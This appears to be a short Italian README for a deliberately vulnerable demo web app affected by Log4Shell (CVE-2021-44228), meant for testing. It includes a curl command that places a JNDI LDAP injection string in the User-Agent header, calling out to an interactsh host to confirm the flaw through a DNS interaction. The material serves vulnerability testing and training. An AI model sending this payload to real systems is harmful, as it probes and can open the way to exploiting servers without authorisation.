
Webapp semplice vulnerabile a Log4Shell (CVE-2021-44228)
L'applicazione registra l'intestazione 'User-Agent', quindi è possibile testare la vulnerabilità con curl e ad esempio interactsh-service:
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
Si dovrebbe vedere un'interazione DNS su app.interactsh.com.
Collegamento a Docker hub